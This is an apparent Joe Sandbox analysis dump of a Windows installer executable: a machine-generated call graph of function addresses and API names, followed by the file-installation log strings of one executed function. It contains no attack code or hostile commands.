4 API calls 48409->48412 48414 45071c 23 API calls 48409->48414 48410 403744 4 API calls 48410->48413 48411->48409 48412->48409 48413->48401 48413->48409 48413->48410 48424 4038a4 48413->48424 48433 403450 48413->48433 48414->48409 48415->48394 48417 450737 48416->48417 48418 45072c 48416->48418 48450 4506c0 21 API calls 48417->48450 48439 45bf90 48418->48439 48420 450735 48420->48403 48421 450742 48421->48420 48451 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 48421->48451 48426 4038b1 48424->48426 48431 4038e1 48424->48431 48425 403400 4 API calls 48428 4038cb 48425->48428 48427 4038da 48426->48427 48429 4038bd 48426->48429 48430 4034bc 4 API calls 48427->48430 48428->48413 48458 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 48429->48458 48430->48431 48431->48425 48434 403454 48433->48434 48437 403464 48433->48437 48436 4034bc 4 API calls 48434->48436 48434->48437 48435 403490 48435->48413 48436->48437 48437->48435 48438 402660 4 API calls 48437->48438 48438->48435 48440 45bfa5 48439->48440 48442 45bfb4 48440->48442 48455 45bea8 19 API calls 48440->48455 48443 45bfee 48442->48443 48456 45bea8 19 API calls 48442->48456 48444 45c002 48443->48444 48457 45bea8 19 API calls 48443->48457 48449 45c02e 48444->48449 48452 45bf38 48444->48452 48449->48420 48450->48421 48451->48420 48453 45bf47 VirtualFree 48452->48453 48454 45bf59 VirtualAlloc 48452->48454 48453->48454 48454->48449 48455->48442 48456->48443 48457->48444 48458->48428 53717 416ab2 53718 416b5a 53717->53718 53719 416aca 53717->53719 53736 41528c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53718->53736 53721 416ae4 SendMessageA 53719->53721 53722 416ad8 53719->53722 53732 416b38 53721->53732 53723 416ae2 CallWindowProcA 53722->53723 53724 416afe 53722->53724 53723->53732 53733 419fc8 GetSysColor 53724->53733 53727 416b09 SetTextColor 53728 416b1e 53727->53728 53734 419fc8 GetSysColor 53728->53734 53730 416b23 SetBkColor 53735 41a650 GetSysColor CreateBrushIndirect 53730->53735 53733->53727 53734->53730 53735->53732 53736->53732 48459 40cd94 48462 406e78 WriteFile 48459->48462 48463 406e95 48462->48463 53737 4165b4 53738 4165c1 53737->53738 53739 41661b 53737->53739 53744 4164c0 CreateWindowExA 53738->53744 53740 4165c8 SetPropA SetPropA 53740->53739 53741 4165fb 53740->53741 53742 41660e SetWindowPos 53741->53742 53742->53739 53744->53740 48464 42ed54 48465 42ed63 NtdllDefWindowProc_A 48464->48465 48466 42ed5f 48464->48466 48465->48466 48467 422254 48468 422263 48467->48468 48473 4211e4 48468->48473 48471 422283 48474 421253 48473->48474 48476 4211f3 48473->48476 48478 421264 48474->48478 48498 412440 GetMenuItemCount GetMenuStringA GetMenuState 48474->48498 48476->48474 48497 408c94 19 API calls 48476->48497 48477 421292 48481 421305 48477->48481 48488 4212ad 48477->48488 48478->48477 48479 42132a 48478->48479 48482 42133e SetMenu 48479->48482 48494 421303 48479->48494 48480 421356 48501 42112c 10 API calls 48480->48501 48486 421319 48481->48486 48481->48494 48482->48494 48485 42135d 48485->48471 48496 422158 10 API calls 48485->48496 48489 421322 SetMenu 48486->48489 48490 4212d0 GetMenu 48488->48490 48488->48494 48489->48494 48491 4212f3 48490->48491 48492 4212da 48490->48492 48499 412440 GetMenuItemCount GetMenuStringA GetMenuState 48491->48499 48495 4212ed SetMenu 48492->48495 48494->48480 48500 421d9c 11 API calls 48494->48500 48495->48491 48496->48471 48497->48476 48498->48478 48499->48494 48500->48480 48501->48485 53745 4678f0 53746 467926 53745->53746 53771 467b13 53745->53771 53748 46795a 53746->53748 53751 4679a4 53746->53751 53752 4679b5 53746->53752 53753 467982 53746->53753 53754 467993 53746->53754 53755 467971 53746->53755 53747 403400 4 API calls 53750 467b9f 53747->53750 53749 465094 19 API calls 53748->53749 53748->53771 53764 4679d7 53749->53764 53760 403400 4 API calls 53750->53760 53939 467660 61 API calls 53751->53939 53940 467880 40 API calls 53752->53940 53938 467344 37 API calls 53753->53938 53781 46748c 53754->53781 53937 4671dc 42 API calls 53755->53937 53763 467ba7 53760->53763 53762 467977 53762->53748 53762->53771 53765 467a19 53764->53765 53766 48eca0 18 API calls 53764->53766 53764->53771 53767 464fd0 19 API calls 53765->53767 53768 467b00 53765->53768 53769 414a58 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53765->53769 53765->53771 53772 42ca9c 6 API calls 53765->53772 53773 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53765->53773 53776 466bec 23 API calls 53765->53776 53778 467b81 53765->53778 53822 466b18 53765->53822 53829 466320 53765->53829 53866 47d43c 53765->53866 53942 466fb8 19 API calls 53765->53942 53766->53765 53767->53765 53941 47d880 97 API calls 53768->53941 53769->53765 53771->53747 53772->53765 53773->53765 53776->53765 53780 466bec 23 API calls 53778->53780 53780->53771 53943 467f90 53781->53943 53784 467624 53785 403400 4 API calls 53784->53785 53787 467639 53785->53787 53786 414a58 4 API calls 53788 4674da 53786->53788 53789 403420 4 API calls 53787->53789 53790 4674e7 53788->53790 53791 467615 53788->53791 53793 467646 53789->53793 53794 42c7a8 5 API calls 53790->53794 53792 403450 4 API calls 53791->53792 53792->53784 53795 403400 4 API calls 53793->53795 53796 4674f6 53794->53796 53797 46764e 53795->53797 53798 42c36c 5 API calls 53796->53798 53797->53748 53799 467501 53798->53799 53946 454574 13 API calls 53799->53946 53801 4675d3 53801->53784 53801->53791 53806 42cc24 7 API calls 53801->53806 53802 42cc24 7 API calls 53804 4675ac 53802->53804 53803 46750e 53805 462aac 19 API calls 53803->53805 53821 467573 53803->53821 53804->53801 53807 4508e0 4 API calls 53804->53807 53808 46753d 53805->53808 53809 4675e9 53806->53809 53810 4675c3 53807->53810 53811 462aac 19 API calls 53808->53811 53809->53791 53812 4508e0 4 API calls 53809->53812 53948 4795d4 37 API calls 53810->53948 53814 46754e 53811->53814 53815 467600 53812->53815 53816 4508b0 4 API calls 53814->53816 53949 4795d4 37 API calls 53815->53949 53818 467563 53816->53818 53947 4795d4 37 API calls 53818->53947 53819 467610 53819->53784 53819->53791 53821->53784 53821->53801 53821->53802 53823 466b29 53822->53823 53825 466b24 53822->53825 54141 465ea0 45 API calls 53823->54141 53824 466b27 53824->53765 53825->53824 54056 466584 53825->54056 53827 466b31 53827->53765 53830 466353 53829->53830 54157 478628 53830->54157 53832 466368 53833 46638f 53832->53833 53834 46636c 53832->53834 53836 466386 53833->53836 54174 48eba4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53833->54174 53835 462cac 20 API calls 53834->53835 53837 466376 53835->53837 53840 403494 4 API calls 53836->53840 53865 4664b9 53836->53865 53839 403450 4 API calls 53837->53839 53839->53836 53843 466462 53840->53843 53841 403400 4 API calls 53844 4664ee 53841->53844 53842 4663ab 53842->53836 53845 4663b3 53842->53845 53846 40357c 4 API calls 53843->53846 53844->53765 53847 466bec 23 API calls 53845->53847 53848 46646f 53846->53848 53849 4663c0 53847->53849 53850 40357c 4 API calls 53848->53850 54175 42ed94 53849->54175 53852 46647c 53850->53852 53855 40357c 4 API calls 53852->53855 53857 466489 53855->53857 53856 466402 53859 403450 4 API calls 53856->53859 53858 40357c 4 API calls 53857->53858 53860 466497 53858->53860 53861 466412 53859->53861 53862 414a88 4 API calls 53860->53862 53861->53765 53863 4664a8 53862->53863 53864 462fe4 11 API calls 53863->53864 53864->53865 53865->53841 53867 467f90 42 API calls 53866->53867 53868 47d47f 53867->53868 53869 47d488 53868->53869 54397 408b48 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53868->54397 53871 414a58 4 API calls 53869->53871 53872 47d498 53871->53872 53873 403450 4 API calls 53872->53873 53874 47d4a5 53873->53874 54224 4682a0 53874->54224 53877 47d4b5 53879 414a58 4 API calls 53877->53879 53880 47d4c5 53879->53880 53881 403450 4 API calls 53880->53881 53882 47d4d2 53881->53882 53883 465c88 SendMessageA 53882->53883 53884 47d4eb 53883->53884 53885 47d529 53884->53885 54399 474c9c 23 API calls 53884->54399 53887 42414c 11 API calls 53885->53887 53888 47d533 53887->53888 53889 47d544 SetActiveWindow 53888->53889 53890 47d559 53888->53890 53889->53890 54253 47ca40 53890->54253 53937->53762 53938->53748 53939->53748 53940->53748 53941->53771 53942->53765 53950 46801c 53943->53950 53946->53803 53947->53821 53948->53801 53949->53819 53951 414a58 4 API calls 53950->53951 53952 46804e 53951->53952 54004 462d44 53952->54004 53955 414a88 4 API calls 53956 468060 53955->53956 53957 46806f 53956->53957 53959 468088 53956->53959 54033 4795d4 37 API calls 53957->54033 53961 4680cf 53959->53961 53963 4680b6 53959->53963 53960 403420 4 API calls 53962 4674be 53960->53962 53964 468134 53961->53964 53977 4680d3 53961->53977 53962->53784 53962->53786 54034 4795d4 37 API calls 53963->54034 54036 42ca28 CharNextA 53964->54036 53967 468143 53968 468147 53967->53968 53973 468160 53967->53973 54037 4795d4 37 API calls 53968->54037 53970 46811b 54035 4795d4 37 API calls 53970->54035 53972 468184 54038 4795d4 37 API calls 53972->54038 53973->53972 54013 462eb4 53973->54013 53977->53970 53977->53973 53980 46819d 53981 403778 4 API calls 53980->53981 53982 4681b3 53981->53982 54021 42c878 53982->54021 53985 4681c4 54039 462f40 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53985->54039 53986 4681f2 53987 42c7a8 5 API calls 53986->53987 53989 4681fd 53987->53989 53991 42c36c 5 API calls 53989->53991 53990 4681d7 53992 4508e0 4 API calls 53990->53992 53994 468208 53991->53994 53993 4681e4 53992->53993 54040 4795d4 37 API calls 53993->54040 53996 42ca9c 6 API calls 53994->53996 53998 468213 53996->53998 53997 468083 53997->53960 54025 467fb0 53998->54025 54000 46821b 54001 42cc24 7 API calls 54000->54001 54002 468223 54001->54002 54002->53997 54041 4795d4 37 API calls 54002->54041 54007 462d5e 54004->54007 54006 42ca9c 6 API calls 54006->54007 54007->54006 54008 403450 4 API calls 54007->54008 54009 406b18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54007->54009 54010 462da7 54007->54010 54042 42c988 54007->54042 54008->54007 54009->54007 54011 403420 4 API calls 54010->54011 54012 462dc1 54011->54012 54012->53955 54014 462ebe 54013->54014 54015 462ed1 54014->54015 54053 42ca18 CharNextA 54014->54053 54015->53972 54017 462ee4 54015->54017 54018 462eee 54017->54018 54019 462f1b 54018->54019 54054 42ca18 CharNextA 54018->54054 54019->53972 54019->53980 54022 42c8d1 54021->54022 54023 42c88e 54021->54023 54022->53985 54022->53986 54023->54022 54055 42ca18 CharNextA 54023->54055 54026 468015 54025->54026 54027 467fc3 54025->54027 54026->54000 54027->54026 54028 41ee14 2 API calls 54027->54028 54029 467fd3 54028->54029 54030 467fed SHPathPrepareForWriteA 54029->54030 54031 41eec8 6 API calls 54030->54031 54032 46800d 54031->54032 54032->54000 54033->53997 54034->53997 54035->53997 54036->53967 54037->53997 54038->53997 54039->53990 54040->53997 54041->53997 54043 403494 4 API calls 54042->54043 54044 42c998 54043->54044 54045 403744 4 API calls 54044->54045 54048 42c9ce 54044->54048 54051 42c3b4 IsDBCSLeadByte 54044->54051 54045->54044 54047 42ca12 54047->54007 54048->54047 54050 4037b8 4 API calls 54048->54050 54052 42c3b4 IsDBCSLeadByte 54048->54052 54050->54048 54051->54044 54052->54048 54053->54014 54054->54018 54055->54023 54058 4665cb 54056->54058 54057 466a43 54059 466a5e 54057->54059 54060 466a8f 54057->54060 54058->54057 54061 466686 54058->54061 54065 403494 4 API calls 54058->54065 54064 403494 4 API calls 54059->54064 54062 403494 4 API calls 54060->54062 54063 4666a7 54061->54063 54067 4666e8 54061->54067 54066 466a9d 54062->54066 54068 403494 4 API calls 54063->54068 54069 466a6c 54064->54069 54070 46660a 54065->54070 54154 46557c 12 API calls 54066->54154 54071 403400 4 API calls 54067->54071 54073 4666b5 54068->54073 54153 46557c 12 API calls 54069->54153 54075 414a58 4 API calls 54070->54075 54076 4666e6 54071->54076 54077 414a58 4 API calls 54073->54077 54079 46662b 54075->54079 54098 4667cc 54076->54098 54142 465c88 54076->54142 54081 4666d6 54077->54081 54078 466a7a 54080 403400 4 API calls 54078->54080 54082 403634 4 API calls 54079->54082 54084 466ac0 54080->54084 54086 403634 4 API calls 54081->54086 54087 46663b 54082->54087 54091 403400 4 API calls 54084->54091 54085 466854 54089 403400 4 API calls 54085->54089 54086->54076 54088 414a58 4 API calls 54087->54088 54092 46664f 54088->54092 54101 466852 54089->54101 54090 466708 54093 466746 54090->54093 54094 46670e 54090->54094 54095 466ac8 54091->54095 54092->54061 54100 414a58 4 API calls 54092->54100 54099 403400 4 API calls 54093->54099 54096 403494 4 API calls 54094->54096 54097 403420 4 API calls 54095->54097 54102 46671c 54096->54102 54103 466ad5 54097->54103 54098->54085 54104 466813 54098->54104 54105 466744 54099->54105 54106 466676 54100->54106 54148 4660c4 42 API calls 54101->54148 54108 476f14 42 API calls 54102->54108 54103->53824 54109 403494 4 API calls 54104->54109 54114 465f7c 42 API calls 54105->54114 54110 403634 4 API calls 54106->54110 54112 466734 54108->54112 54113 466821 54109->54113 54110->54061 54111 46687d 54119 4668de 54111->54119 54120 466888 54111->54120 54115 403634 4 API calls 54112->54115 54116 414a58 4 API calls 54113->54116 54121 46676d 54114->54121 54115->54105 54117 466842 54116->54117 54118 403634 4 API calls 54117->54118 54118->54101 54122 403400 4 API calls 54119->54122 54123 403494 4 API calls 54120->54123 54124 4667ce 54121->54124 54125 466778 54121->54125 54126 4668e6 54122->54126 54130 466896 54123->54130 54127 403400 4 API calls 54124->54127 54128 403494 4 API calls 54125->54128 54129 4668dc 54126->54129 54140 46698f 54126->54140 54127->54098 54133 466786 54128->54133 54129->54126 54149 48eba4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54129->54149 54130->54126 54130->54129 54135 403634 4 API calls 54130->54135 54132 466909 54132->54140 54150 48ee0c 18 API calls 54132->54150 54133->54098 54136 403634 4 API calls 54133->54136 54135->54130 54136->54133 54138 466a30 54152 4290b4 SendMessageA SendMessageA 54138->54152 54151 429064 SendMessageA 54140->54151 54141->53827 54155 429fb0 SendMessageA 54142->54155 54144 465cb7 54144->54090 54145 465c97 54145->54144 54156 429fb0 SendMessageA 54145->54156 54147 465ca7 54147->54090 54148->54111 54149->54132 54150->54140 54151->54138 54152->54057 54153->54078 54154->54078 54155->54145 54156->54147 54158 478656 54157->54158 54162 47868c 54157->54162 54192 454474 54158->54192 54159 403420 4 API calls 54160 47878d 54159->54160 54160->53832 54162->54159 54163 478756 54163->53832 54164 474518 19 API calls 54167 478680 54164->54167 54165 476f14 42 API calls 54170 478704 54165->54170 54166 476f14 42 API calls 54166->54167 54167->54162 54167->54163 54167->54164 54167->54166 54167->54170 54199 4781e8 31 API calls 54167->54199 54169 42c808 5 API calls 54169->54170 54170->54165 54170->54167 54170->54169 54171 42c830 5 API calls 54170->54171 54173 478743 54170->54173 54200 478334 54 API calls 54170->54200 54171->54170 54173->54162 54174->53842 54176 42eda0 54175->54176 54177 42edc3 GetActiveWindow GetFocus 54176->54177 54178 41ee14 2 API calls 54177->54178 54179 42edda 54178->54179 54180 42edf7 54179->54180 54181 42ede7 RegisterClassA 54179->54181 54182 42ee86 SetFocus 54180->54182 54183 42ee05 CreateWindowExA 54180->54183 54181->54180 54185 403400 4 API calls 54182->54185 54183->54182 54184 42ee38 54183->54184 54218 4241ec 54184->54218 54187 42eea2 54185->54187 54191 48ee0c 18 API calls 54187->54191 54188 42ee60 54189 42ee68 CreateWindowExA 54188->54189 54189->54182 54190 42ee7e ShowWindow 54189->54190 54190->54182 54191->53856 54193 454485 54192->54193 54194 454492 54193->54194 54195 454489 54193->54195 54209 454258 29 API calls 54194->54209 54201 454178 54195->54201 54198 45448f 54198->54167 54199->54167 54200->54170 54202 42dc54 RegOpenKeyExA 54201->54202 54203 454195 54202->54203 54204 4541e3 54203->54204 54210 4540ac 54203->54210 54204->54198 54207 4540ac 6 API calls 54208 4541c4 RegCloseKey 54207->54208 54208->54198 54209->54198 54215 42db90 54210->54215 54212 403420 4 API calls 54213 45415e 54212->54213 54213->54207 54214 4540d4 54214->54212 54216 42da38 6 API calls 54215->54216 54217 42db99 54216->54217 54217->54214 54219 42421e 54218->54219 54220 4241fe GetWindowTextA 54218->54220 54221 403494 4 API calls 54219->54221 54222 4034e0 4 API calls 54220->54222 54223 42421c 54221->54223 54222->54223 54223->54188 54225 4682c9 54224->54225 54226 414a58 4 API calls 54225->54226 54252 468316 54225->54252 54227 4682df 54226->54227 54405 462dd0 6 API calls 54227->54405 54228 403420 4 API calls 54230 4683c0 54228->54230 54230->53877 54398 408b48 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54230->54398 54231 4682e7 54232 414a88 4 API calls 54231->54232 54233 4682f5 54232->54233 54234 468302 54233->54234 54236 46831b 54233->54236 54406 4795d4 37 API calls 54234->54406 54237 468333 54236->54237 54238 462eb4 CharNextA 54236->54238 54407 4795d4 37 API calls 54237->54407 54240 46832f 54238->54240 54240->54237 54241 468349 54240->54241 54242 468365 54241->54242 54243 46834f 54241->54243 54245 42c878 CharNextA 54242->54245 54408 4795d4 37 API calls 54243->54408 54246 468372 54245->54246 54246->54252 54409 462f40 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54246->54409 54248 468389 54249 4508e0 4 API calls 54248->54249 54250 468396 54249->54250 54410 4795d4 37 API calls 54250->54410 54252->54228 54254 47ca91 54253->54254 54255 47ca63 54253->54255 54257 47123c 54254->54257 54411 48ebc0 18 API calls 54255->54411 54258 455bc8 24 API calls 54257->54258 54259 471288 54258->54259 54260 407210 SetCurrentDirectoryA 54259->54260 54261 471292 54260->54261 54412 469db0 54261->54412 54266 476f14 42 API calls 54267 4712ee 54266->54267 54269 4712fe 54267->54269 54815 451cc8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54267->54815 54270 471320 54269->54270 54816 451cc8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54269->54816 54272 473d54 20 API calls 54270->54272 54273 47132b 54272->54273 54274 403450 4 API calls 54273->54274 54275 471348 54274->54275 54276 403450 4 API calls 54275->54276 54277 471356 54276->54277 54422 46a398 54277->54422 54281 4713bc 54462 471194 54281->54462 54399->53885 54405->54231 54406->54252 54407->54252 54408->54252 54409->54248 54410->54252 54411->54254 54417 469dd7 54412->54417 54413 469e54 54823 44f280 54413->54823 54414 474518 19 API calls 54414->54417 54417->54413 54417->54414 54418 45849c 54419 4584a2 54418->54419 54420 458784 4 API calls 54419->54420 54421 4584be 54420->54421 54421->54266 54423 46a3d6 54422->54423 54424 46a3c6 54422->54424 54425 403400 4 API calls 54423->54425 54426 403494 4 API calls 54424->54426 54427 46a3d4 54425->54427 54426->54427 54428 453cc8 5 API calls 54427->54428 54429 46a3ea 54428->54429 54430 453d04 5 API calls 54429->54430 54431 46a3f8 54430->54431 54432 46a370 5 API calls 54431->54432 54433 46a40c 54432->54433 54434 458558 4 API calls 54433->54434 54435 46a424 54434->54435 54436 403420 4 API calls 54435->54436 54437 46a43e 54436->54437 54438 403400 4 API calls 54437->54438 54439 46a446 54438->54439 54440 46a5a4 54439->54440 54441 4034e0 4 API calls 54440->54441 54442 46a5e1 54441->54442 54443 46a5ea 54442->54443 54444 46a5f9 54442->54444 54446 476f14 42 API calls 54443->54446 54445 403400 4 API calls 54444->54445 54447 46a5f7 54445->54447 54446->54447 54448 476f14 42 API calls 54447->54448 54449 46a61c 54448->54449 54450 46a64b 54449->54450 54835 46a458 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54449->54835 54832 46a590 54450->54832 54454 476f14 42 API calls 54455 46a68c 54454->54455 54456 458558 4 API calls 54455->54456 54457 46a6aa 54456->54457 54458 403420 4 API calls 54457->54458 54459 46a6c4 54458->54459 54460 403420 4 API calls 54459->54460 54461 46a6d1 54460->54461 54461->54281 54463 4711a4 54462->54463 54465 4711d5 54462->54465 54464 4743d8 19 API calls 54463->54464 54463->54465 54464->54463 54466 469f20 54465->54466 54467 469f2e 54466->54467 54468 469f29 54466->54468 54836 42441c 54467->54836 54840 408b48 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54468->54840 54815->54269 54816->54270 54826 44f294 54823->54826 54827 44f2a5 54826->54827 54828 44f2c6 MulDiv 54827->54828 54829 44f291 54827->54829 54830 418150 54828->54830 54829->54418 54831 44f2f1 SendMessageA 54830->54831 54831->54829 54833 403494 4 API calls 54832->54833 54834 46a59f 54833->54834 54834->54454 54835->54450 55863 435174 55864 435189 55863->55864 55868 4351a3 55864->55868 55869 434b5c 55864->55869 55873 434ba6 55869->55873 55879 434b8c 55869->55879 55870 403400 4 API calls 55871 434fab 55870->55871 55871->55868 55882 434fbc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55871->55882 55872 446638 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55872->55879 55873->55870 55874 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55874->55879 55875 402648 4 API calls 55875->55879 55876 431534 4 API calls 55876->55879 55877 4038a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55877->55879 55879->55872 55879->55873 55879->55874 55879->55875 55879->55876 55879->55877 55880 403744 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55879->55880 55883 433c44 55879->55883 55895 434408 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55879->55895 55880->55879 55882->55868 55884 433d01 55883->55884 55885 433c71 55883->55885 55914 433ba4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55884->55914 55887 403494 4 API calls 55885->55887 55889 433c7f 55887->55889 55888 433cf3 55891 403400 4 API calls 55888->55891 55890 403778 4 API calls 55889->55890 55893 433ca0 55890->55893 55892 433d51 55891->55892 55892->55879 55893->55888 55896 48e858 55893->55896 55895->55879 55897 48e928 55896->55897 55898 48e890 55896->55898 55915 4481c4 55897->55915 55900 403494 4 API calls 55898->55900 55902 48e89b 55900->55902 55901 403400 4 API calls 55903 48e94c 55901->55903 55904 4037b8 4 API calls 55902->55904 55908 48e8ab 55902->55908 55905 403400 4 API calls 55903->55905 55907 48e8c4 55904->55907 55906 48e954 55905->55906 55906->55893 55907->55908 55909 4037b8 4 API calls 55907->55909 55908->55901 55910 48e8e7 55909->55910 55911 403778 4 API calls 55910->55911 55912 48e918 55911->55912 55913 403634 4 API calls 55912->55913 55913->55897 55914->55888 55916 4481e9 55915->55916 55926 44822c 55915->55926 55917 403494 4 API calls 55916->55917 55919 4481f4 55917->55919 55918 448240 55921 403400 4 API calls 55918->55921 55923 4037b8 4 API calls 55919->55923 55922 448273 55921->55922 55922->55908 55924 448210 55923->55924 55925 4037b8 4 API calls 55924->55925 55925->55926 55926->55918 55927 447dc0 55926->55927 55928 403494 4 API calls 55927->55928 55929 447df6 55928->55929 55930 4037b8 4 API calls 55929->55930 55931 447e08 55930->55931 55932 403778 4 API calls 55931->55932 55933 447e29 55932->55933 55934 4037b8 4 API calls 55933->55934 55935 447e41 55934->55935 55936 403778 4 API calls 55935->55936 55937 447e6c 55936->55937 55938 4037b8 4 API calls 55937->55938 55939 447e84 55938->55939 55940 447ebc 55939->55940 55941 447f57 55939->55941 55943 447ef1 LoadLibraryA 55939->55943 55946 447edf LoadLibraryExA 55939->55946 55948 403b80 4 API calls 55939->55948 55949 403450 4 API calls 55939->55949 55951 43d31c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55939->55951 55942 403420 4 API calls 55940->55942 55944 447f5f GetProcAddress 55941->55944 55945 447f9c 55942->55945 55943->55939 55947 447f72 55944->55947 55945->55918 55946->55939 55947->55940 55948->55939 55949->55939 55951->55939 55952 44ad3c 55953 44ad4a 55952->55953 55955 44ad69 55952->55955 55954 44ac20 11 API calls 55953->55954 55953->55955 55954->55955 55956 447fbc 55957 447ff1 55956->55957 55958 447fea 55956->55958 55959 448005 55957->55959 55961 447dc0 7 API calls 55957->55961 55960 403400 4 API calls 55958->55960 55959->55958 55962 403494 4 API calls 55959->55962 55963 44819b 55960->55963 55961->55959 55964 44801e 55962->55964 55965 4037b8 4 API calls 55964->55965 55966 44803a 55965->55966 55967 4037b8 4 API calls 55966->55967 55968 448056 55967->55968 55968->55958 55969 44806a 55968->55969 55970 4037b8 4 API calls 55969->55970 55971 448084 55970->55971 55972 431464 4 API calls 55971->55972 55973 4480a6 55972->55973 55974 431534 4 API calls 55973->55974 55981 4480c6 55973->55981 55974->55973 55975 44811c 55988 441bc8 55975->55988 55976 448104 55976->55975 56000 442e64 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55976->56000 55980 448150 GetLastError 56001 447d54 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55980->56001 55981->55976 55999 442e64 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55981->55999 55983 44815f 56002 442ea4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55983->56002 55985 448174 56003 442eb4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55985->56003 55987 44817c 55989 442ba6 55988->55989 55990 441c01 55988->55990 55991 403400 4 API calls 55989->55991 55992 403400 4 API calls 55990->55992 55993 442bbb 55991->55993 55994 441c09 55992->55994 55993->55980 55995 431464 4 API calls 55994->55995 55997 441c15 55995->55997 55996 442b96 55996->55980 55997->55996 56004 4412a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55997->56004 55999->55981 56000->55975 56001->55983 56002->55985 56003->55987 56004->55997 48502 40cfdc 48503 40cfe4 48502->48503 48504 40d012 48503->48504 48505 40d007 48503->48505 48510 40d00e 48503->48510 48507 40d016 48504->48507 48508 40d028 48504->48508 48514 4062a0 GlobalHandle GlobalUnWire GlobalFree 48505->48514 48515 406274 GlobalAlloc GlobalFix 48507->48515 48516 406284 GlobalHandle GlobalUnWire GlobalReAlloc GlobalFix 48508->48516 48512 40d024 48512->48510 48517 408c24 48512->48517 48514->48510 48515->48512 48516->48512 48518 408c30 48517->48518 48525 406d54 LoadStringA 48518->48525 48521 403450 4 API calls 48522 408c61 48521->48522 48523 403400 4 API calls 48522->48523 48524 408c76 48523->48524 48524->48510 48526 4034e0 4 API calls 48525->48526 48527 406d81 48526->48527 48527->48521 48528 41655c 73A25CF0

                                                                          Executed Functions

                                                                          Function 0046C0D0 Relevance: 78.0, APIs: 4, Strings: 40, Instructions: 959COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • Time stamp of existing file: %s, xrefs: 0046C453
                                                                          • Dest file is protected by Windows File Protection., xrefs: 0046C315
                                                                          • Failed to read existing file's MD5 sum. Proceeding., xrefs: 0046C6F8
                                                                          • Existing file is a newer version. Skipping., xrefs: 0046C62A
                                                                          • Couldn't read time stamp. Skipping., xrefs: 0046C75D
                                                                          • User opted not to overwrite the existing file. Skipping., xrefs: 0046C875
                                                                          • Existing file has a later time stamp. Skipping., xrefs: 0046C7F7
                                                                          • @, xrefs: 0046C1D8
                                                                          • Same time stamp. Skipping., xrefs: 0046C77D
                                                                          • Existing file's MD5 sum matches our file. Skipping., xrefs: 0046C6DD
                                                                          • Dest file exists., xrefs: 0046C3E3
                                                                          • Skipping due to "onlyifdoesntexist" flag., xrefs: 0046C3F6
                                                                          • .tmp, xrefs: 0046C9DF
                                                                          • Time stamp of our file: (failed to read), xrefs: 0046C3CF
                                                                          • InUn, xrefs: 0046CB6D
                                                                          • Stripped read-only attribute., xrefs: 0046C8EF
                                                                          • Version of existing file: (none), xrefs: 0046C722
                                                                          • Non-default bitness: 64-bit, xrefs: 0046C2D7
                                                                          • -- File entry --, xrefs: 0046C123
                                                                          • Version of our file: %u.%u.%u.%u, xrefs: 0046C518
                                                                          • Same version. Skipping., xrefs: 0046C70D
                                                                          • Time stamp of existing file: (failed to read), xrefs: 0046C45F
                                                                          • Existing file's MD5 sum is different from our file. Proceeding., xrefs: 0046C6EC
                                                                          • Incrementing shared file count (64-bit)., xrefs: 0046CF97
                                                                          • Existing file is protected by Windows File Protection. Skipping., xrefs: 0046C814
                                                                          • , xrefs: 0046C5F7, 0046C7C8, 0046C846
                                                                          • Version of existing file: %u.%u.%u.%u, xrefs: 0046C5A4
                                                                          • Dest filename: %s, xrefs: 0046C2BC
                                                                          • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0046C8BE
                                                                          • Will register the file (a DLL/OCX) later., xrefs: 0046CF2A
                                                                          • UF, xrefs: 0046D11F
                                                                          • Time stamp of our file: %s, xrefs: 0046C3C3
                                                                          • Uninstaller requires administrator: %s, xrefs: 0046CB9D
                                                                          • Installing the file., xrefs: 0046C931
                                                                          • Incrementing shared file count (32-bit)., xrefs: 0046CFB0
                                                                          • Skipping due to "onlyifdestfileexists" flag., xrefs: 0046C922
                                                                          • Version of our file: (none), xrefs: 0046C524
                                                                          • Failed to strip read-only attribute., xrefs: 0046C8FB
                                                                          • Will register the file (a type library) later., xrefs: 0046CF1E
                                                                          • Non-default bitness: 32-bit, xrefs: 0046C2E3
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID:
